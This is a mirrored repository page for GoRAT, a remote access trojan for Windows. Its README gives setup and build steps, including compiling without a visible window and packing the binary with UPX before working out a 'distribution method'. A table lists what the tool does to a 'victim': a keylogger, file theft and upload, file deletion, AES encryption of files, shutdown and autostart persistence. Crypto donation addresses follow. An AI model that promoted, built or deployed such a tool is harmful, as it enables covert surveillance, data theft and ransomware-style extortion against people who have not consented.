Git Product home page Git Product logo

gorat's Introduction

GoRAT 1.3

⚙️🗡️GoRAT is a powerful remote access trojan for windows 7, 8 and 10 operating systems with many features

alt text

Hi, this is RAT for the Windows operating system version 7, 8 and 10. The server part can be run on any operating system where Golang is installed.

Install

  1. Clone this repository.

  2. go to the client directory and change the IP parameter to the public IP of the computer where the server file will be launched. You can also use 127.0.0.1 to test PAT on one computer specify the public ip address of the computer where the server.go file will be launched; you can also change the PORT in client.go and server.go to the same one.

  3. install mingw follow the instructions: http://www.mingw.org/wiki/HOWTO_Install_the_MinGW_GCC_Compiler_Suite

  4. Install libraries for colours using command:

    go get github.com/fatih/color

    go get github.com/TheTitanrain/w32

    go get github.com/ProtonMail/go-autostart

  5. On the Windows operating system, you need to compile the client.go and kelogger.go file with the command: go build -ldflags -H=windowsgui .

  6. If you wish, you can compress the finished exe file with the upx packer and come up with a distribution method, but you yourself will decide.

GoRAT features

[Autorun]

command description
pwd find out current directory
ls look at some directory
rm delete a file
rmdir delete a directory
file download file from victim up to 65 kb
ifconfig network information
upfile upload file to victim up to to 65 kb
sysinfo all system information
keylogger activate keylogger
crypt encryption using AES. you have two options for encryption: encryption of one file
or directory, if you choose to encrypt a directory, all files in it will be
encrypted, but internal directories will not be decrypted
shutdown shutting down the victim's computer

Donate

monero:
48TmwHGVsqSKgD7giTALoK7P2muKLTJn5R8s5XtKZL1jEr4MJFBAwczVtofuFGvzsT1CzTcFXotwZCDno1UsskqFFZe9wVC

bitcoin:
18LKUKWAUBAFKzLBdFFkt687vh8rMPhL1u

ethereum:
0x189a9436b2fbBd0b1C3927E8a398379DBb7105AA

gorat's People

Contributors

nikait avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.